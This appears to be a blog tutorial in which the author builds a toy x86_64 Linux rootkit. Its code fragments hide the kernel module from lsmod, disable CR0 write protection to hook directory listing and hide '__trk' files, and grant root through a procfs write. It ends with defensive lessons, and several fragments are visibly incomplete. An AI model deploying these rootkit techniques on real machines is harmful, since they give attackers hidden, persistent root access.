Anatomy of a simple Linux rootkit

I'm not a security guy, and most of the programs I write run on things with kilobytes of memory, but I've always had a bit of an interest in the problem of computer security. Some of it is indirect: I have to write secure code, so you have to learn about how to write secure code -- and an important part of that is learning how to spot insecure code that you wrote. Some of it is direct though. One of the bets ways to learn the innards of an operating system is to try and tamper with its "normal" operation. When you manage to do it, it's typically a sign that you have understood that part of operation that you're tampering with.

So a few days ago I set out to write a very trivial (i.e. useless) rootkit for Linux, and chronicled things all along.

The last time I wrote any code for the Linux kernel, 2.6.32 was still new, so I figured this would be a great way to remember a few things. Besides, a rootkit is probably the most trivial form of malware that one can write. A rootkit is inserted at a point when the attacker has already compromised the machine, has root access, and wants to keep it. It doesn't have to be too subtle, because it can do virtually anything to hide itself. It doesn't have to go around too many protection mechanisms, either: the user is root and can insmod things. You get to poke around the kernel. If a protection mechanism is in the way, you can just disable it.

Note that the point here was not to write a viable rootkit. This is easy to detect. I'm just scratching the surface, but there are a few interesting lessons to be learned even from something as small as this.

What we'll do

We'll write a kernel module that:

  1. Hides itself from the list of modules.
  2. Hides certain directories, so that we can fill them with good and useful stuff
  3. Spawns a root shell when something in particular happens.

I decided early enough that I'll be fine if it remains architecture-dependent. In principle, something as trivial as what I'll be describing here can be made completely portable, but I didn't want to miss on some interesting points which do mean this will only work on x86_64.

When writing a real exploit, we also generally want to hide one (or more) PIDs from the list of processes. This is a lesson for some other time, perhaps. It's fairly easy to achieve as well, but I can make all the points I want to make without this feature.

Hiding our kernel module

Let's start with the beginning: it's quite pointless to write a tool that hides files if that tool is itself easy. At the very least, it shouldn't show up in lsmod's list.

It's straightforward to see how lsmod gets a list of all kernel modules (here's how Busybox's modutils does it, for instance) but not too informative. We could conceivably trap reads from /proc and not show our own entry, but that's far too complex. In fact, it's a lot more straightforward to just remove our entry.

What entry? Here's how the kernel sees our module (linux.h):

    struct module {
        enum module_state state;
        /* Member of list of modules */
        struct list_head list;
        /* Unique handle for this module */
        char name[MODULE_NAME_LEN];
        /* Sysfs stuff. */
        struct module_kobject mkobj;

Ha! A cursory glance at load_module in modules.c shows that, indeed, our module is added to the list of modules upon loading. So we should take it out of there. The procfs entry is, unsurprisingly, hidden in mkobj, so we should remove that from the list of kobjects as well.

Easy as pie:

    static void module_hide(void)

Just for fun, let's confirm that it works:

    # lsmod | grep trk
    # dmesg
    [6155.845814] Hiding...

Ha. Nice. Looks good.

Hiding directories

Next up: let's hide files. Generally, you want to do this in places that are not accessed too often and not too closely monitored for some reason.

There are a lot of ways to do that, and probably the most straightforward is to replace the getdirents() system call with our own version. I'm going to try something a little different, but probably just as often used though: I'll replace the iterate file operation, which getdirents() uses to obtain the directory listing, with one that will only include some of the entries in the directory.

Intercepting file operations

A struct file always contains a pointer to the table of file operations used to manipulate it. This means we can get it as follows:

    struct file *boot_filp;
    struct file_operations *fs_ops;

    boot_filp = filp_open("/boot", O_RDONLY, 0);
    if (!boot_filp)
        return -1;

    fs_ops = (struct file_operations *)(boot_filp->f_op);

    filp_close(boot_filp, NULL);

Right: now we have a pointer to the f_op entry in boot_filp. At the other end of the pointer lays a table of operations populated by the filesystem driver: open, close, write and a bunch of others -- including the one we're interested in, iterate. We opened /boot, but the operations table is in the filesystem driver, so we actually got access to the driver of whatever filesystem /boot happens to be. In most cases, /boot will be the same filesystem type as every other partition on the hard drive, but not necessarily -- which means that (depending on the setup), we may not be able to hide directories outside /boot.

Ok, so we only have to replace that and we're done. Easy as pie, it seems. But it's not that straightforward. For obvious reasons, the table of file operations resides in rodata: it's read-only.

Now, at least on x86_64 (but not only -- this tends to be true for most von Neumann and modified Harvard architectures), "read only" is... more or less a convention if you're in supervisor mode. rodata's pages are marked read-only, but we can obviously mark them as read-write if we wish (we're the supervisor after all, aren't we?). However, doing so is not very comfortable; there aren't many reasons why something outside the memory management module would want to mess with page attributes, so the API being exposed is pretty barren (and not too stable; it doesn't look at all like what I remembered from 2.6).

However, x86_64 "helpfully" allows us to just bring an elephant into the porcelain shop, let him smash everything he wants, then flip a switch to piece everything back together once he's out. Here's what the documentation says about the WP flag in CR0:

WP Write Protect (bit 16 of CR0) - When set, inhibits supervisor-level procedures from writing into read-only pages; when clear, allows supervisor-level procedures to write into read-only pages (regardless of the U/S bit setting; see Section 4.1.3 and Section 4.6). This flag facilitates implementation of the copy-on-write method of creating a new process (forking) used by operating systems such as UNIX.

We can globally disable write protection. We'll just have to make sure we don't get preempted while we're doing anything with the write protection globally disabled. If we get preempted by something that assumes data in write-protected pages really is write-protected, chaos (or detection...) might ensue.

Ok, let's see what we can come up with.

    static void disable_wprotect(void)
        asm volatile("cli;"
        "movq %cr0, %rax;"
        "andq $0xFFFFFFFFFFFEFFFF, %rax;"
        "movq %rax, %cr0;");

    static void enable_wprotect(void)
        asm volatile("movq %cr0, %rax;"
        "orq $0x10000, %rax;"
        "movq %rax, %cr0;"

Man, I'd almost forgotten how much I hate AT&T syntax.

The basic idea should be obvious: move CR0 to RAX, unset its 16th bit, move the result back to CR0 to disable write protection, do the exact opposite to enable it again. cli (CLear Interrupt flag) disables interrupts, which prevents scheduling as a side-effect (no timer interrupts -- no scheduler to make us pack our bags, no ISRs to run while our code is running). sti does the exact opposite.

Now we can do our malicious replacement. We'll save a pointer to the "good" iterate operation (we still need it in order to get directory entries), but we'll replace its entry in the file operations table with our own function.

    intercepted_iterate = fs_ops->iterate;
    fs_ops->iterate = trk_iterate;

For the moment, trk_iterate does only this:

    static int trk_iterate(struct file *fd, struct dir_context *ctx)
        printk(KERN_DEBUG "Intercepted iterate op.");
        return intercepted_iterate(fd, ctx);

Let's see if this works.

    # insmod trk.ko 
    # ls
    # dmesg
    [ 6006.380270] Intercepted iterate op.

Looks good.

To help you with debugging, it is useful if you do the opposite in the module's exit function -- otherwise our malicious intercept is going to remain in the file operations table of that filesystem's driver after rmmod, and will eventually cause things to go awry.

Tampering with the results

Ok, we've intercepted iterate, now what?

As it turns out, iterate is actually used in combination with a callback -- filldir. The whole story can be found in fs/readdir.c, but long story short is that iterate is going to call the actor callback in the directory context passed to it for every directory entry. actor is going to fill in all the data that will be sent to userspace.

That member is set to filldir, and that's a problem, because the declaration of dir_context looks like this:

    struct dir_context
        const filldir_t actor;
        loff_t pos;

So we can't just say ctx->actor = bad_actor.

Of course, const doesn't really mean "this is read-only", it just says "you can't assign to this member". No one said anything about overwriting it. Our plan here is as follows: in our malicious iterate, we're going to keep a pointer to the "good" filldir, then replace the pointer to the good filldir in the context with a pointer to our own. We then call the original ("good") iterate function with our bad context and restore the good filldir in the dir_context so that we don't look suspicious (and so that any further code that works on that directory context after calling iterate doesn't break).

So our malicious iterate function, along with the bad filldir that it calls, would look like this:

    static filldir_t good_filldir;

    static int bad_filldir(struct dir_context *ctx, const char *name,
                           int namlen, loff_t offset, u64 ino,
                           unsigned int d_type)
        printk(KERN_DEBUG "Bad filldir!");

        if (!strncmp("__trk", name, 5))
            return 0;

        return good_filldir(ctx, name, namlen, offset, ino, d_type);

    static int trk_iterate(struct file *fd, struct dir_context *ctx)
        int err;
        filldir_t p = bad_filldir;
        good_filldir = ctx->actor;

        /* Pollute ctx with the bad filldir */
        memcpy((void *)(&(ctx->actor)), (void *)&p, sizeof p);

        err = intercepted_iterate(fd, ctx);

        /* Restore old actor so that we don't look suspicious */
        p = good_filldir;
        memcpy((void *)(&(ctx->actor)), (void*)&p, sizeof p);

        return err;

Spawning a root shell

There's a long explanation on credentials here and there is no point in covering it myself. I'll just give you the gist of it: each "thing" in the Linux kernel that can be acted upon by userspace programs (i.e. each object, in kernelspeak) has an associated set of credentials. These credentials include -- but are not limited to -- the traditional Unix UID, GID, EUID and EGID (there are also things like capabilities and securebits which open a lot of interesting possibilities but I won't cover here).

There are a lot of ways to trigger the spawning of a root shell, but I want to keep things easy for this example: we'll just create a procfs entry, and writing to it will be the trigger: the write function will alter the credentials of the current (i.e. writing) task, setting the UID and GID to 0. This is simple because, in Linux, a task can only (trivially) alter its own credentials; a write() call is a good place to do it, because we can do that with echo, and echo is usually a shell built-in, which means that the write() will be triggered by the shell itself (and will thus lead to the altering of the spawning shell's own credentials).

Like this:

    static ssize_t pfs_op_write(struct file *file, const char __user *buffer,
                                size_t count, loff_t *ppos)
        struct cred *credentials;
        credentials = prepare_creds();
        credentials->uid.val = 0;
        credentials->euid.val = 0;
        credentials->gid.val = 0;
        credentials->egid.val = 0;
        return count;

The implementation of the procfs-related functions is left as an exercise to the user (or, if you're lazy, you can see it here). Let's see if it works

    $ whoami
    $ echo 2 > /proc/ksym
    $ whoami


What we learned

If it's compromised, wipe it

Let's start with a light one.

If I remember it correctly from the days when I was aspiring to be a sysadmin, it was recommended that, if a machine was compromised to the point that a user obtained root access, it should be disconnected from the network and wiped out. This is why.

Root can tamper with the kernel. If he does it right, all your fancy protection schemes mean nothing, because they can be overruled. Worse yet, they can be silently overruled.

Const means nothing

const is only a semantic convention. It's basically the compiler saying "I shall not allow assignments to this identifier once it's initialized". The compiler will generally keep his promise, but no other process knows about it, let alone care about it.

On some architectures, neither does read-only, and we should think about that a little

On x86_64, page write protection is more or less meaningless. It helps protect against accidental writes to a page that should be read-only, but certainly not against intentional writes.

At this point, one might argue that if the kernel is malevolent, it doesn't matter. Which is more valid a point than it sounds like. At the end of the day, if someone can insert malicious code into the kernel, it really doesn't matter that write protection can't be disabled on your architecture. I mean, if they really want a root account on your system, there are plenty of less subtle things to do, like replacing the whole bloody TTY driver to just intercept passwords or patch sshd to leak keys or whatever. Above, we could have achieved the same result without bypassing the write protection; bypassing write protection is just trivial enough for me to be able to write a page about it, but it's certainly not the only possibility..

There is one place where this should still be a reason to panic though: what if we're running in a hypervisor?

Virtualization is a complex thing. More so when it's patched on an 8-bit CPU on steroids. And bad stuff has been known to happen. There are few things programmers suck less at than managing complexity, and with the rampant complexity of virtualization solutions, they're bound to be ridden with bugs. A compromised hypervisor means a bunch of compromised hosts -- with users who have no idea because they are otherwise running systems that, as far as they can tell, have not been tampered with at all.

But let's imagine that there is life beyond the "dude, someone has root access to your server" disaster and pretend that there are still some relevant things we can do after that.

A first interesting point is that a trivial way to preventing this technique from being used is not loading any modules in the first place. In general, allowing a (possibly malicious) user to add code to the kernel is a vulnerability; arguably, insmod matches the definition. If someone wanted to load his own code into a kernel without loadable module support, their options would be a lot more limited.

A second interesting point: twice, the main entry points in our exploit above have been in the filesystem driver. What if everything except for I/O drivers and the scheduler were to run in userspace? This would make exploitation a lot more difficult. Of course, when someone already has root access on a system, he has a lot of options for maintaining that root access. However, when you're sharing process descriptor tables with every device driver on your system, you are kind of asking for it.

Oh yeah, about binary blobs

Let me write that again.

However, when you're sharing process descriptor tables with every device driver on your system, you are kind of asking for it.

Next time you install a binary-only driver for your network card, think about that.